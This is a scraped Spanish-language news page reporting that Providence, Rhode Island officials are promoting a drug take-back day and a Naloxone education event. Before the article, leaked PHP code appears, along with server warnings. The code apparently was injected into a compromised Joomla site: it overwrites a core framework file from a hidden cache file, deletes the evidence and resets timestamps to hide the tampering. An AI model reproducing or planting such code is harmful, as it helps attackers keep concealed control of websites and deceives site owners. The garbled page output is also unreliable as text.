$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Autoridades locales hacen un llamado a participar en recogida de medicamentos vencidos este sábado

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Autoridades locales hacen un llamado a participar en recogida de medicamentos vencidos este sábado

Imprimir PDF

alt

PROVIDENCE, RI.- El alcalde Jorge Elorza y el coronel Hugh T. Clements, jefe del Departamento de Policía de Providence, hicieron un llamado a los residentes de la ciudad capital para que participen activamente en la campaña nacional de recogida de medicamentos vencidos y en desuso, con la finalidad de reducir el uso indebido de los mismos y prevenir el aumento de los casos de sobredosis en el estado.

La jornada de recolección de medicamentos vencidos tendrá lugar mañana sábado 29 de abril, a partir de las 10 am y hasta las 2 pm, en el edificio del Providence Public Safety Complex (325 Washington Street), y en las farmacias Walgreens, ubicadas en el 533 Elmwood Avenue, 1 Pocasset Avenue y 295 Academy Avenue, en la ciudad capital de Rhode Island.

Asimismo anunciaron que en la farmacia Walgreens de la Elmwood Avenue se realizará una feria de salud, la cual contará con una mesa de educación y concienciación sobre el uso de la inyección de Naloxona para revertir los efectos de una sobredosis, además de pruebas de presión arterial y obsequios para los participantes.

Destacaron que las cajas de recolección de medicamentos vencidos permanecerán indefinidamente en las instalaciones del Providence Public Safety Complex ubicado en el 325 Washington Street, y en la farmacia Walgreens situada en el 533 Elmwood Avenue, en Providence, para que aquellas personas que no puedan entregar los medicamentos este sábado tenga la oportunidad de hacerlo cualquier otro día.

Durante la rueda de prensa, realizada en el Departamento de Policía de Providence, estuvieron presents, Sam Masiello, supervisor de la DEA; Rebecca Boss, directora interina de Rhode Island Department of Behavioral Healthcare, Developmental Disabilities and Hospitals; Steven M. Paré, comisionado de Seguridad Pública de Providence, y Ellen Cynar, Directora de la Oficina de Comunidades Saludables de la Ciudad, entre otros.

El abuso de medicamentos recetados se ha convertido en un serio problema de salud pública en el país, en parte porque éstos son comunes en todos los hogares y su abuso entre los niños continúa en aumento.

En Rhode Island, los casos por sobredosis de drogas se han recrudecido y convertido en una de las principales causas de muerte accidental, reportándose anualmente más muertes por sobredosis que por asesinato, incendios intencionales y accidentes automovilísticos. (Foto Acontecer Latino)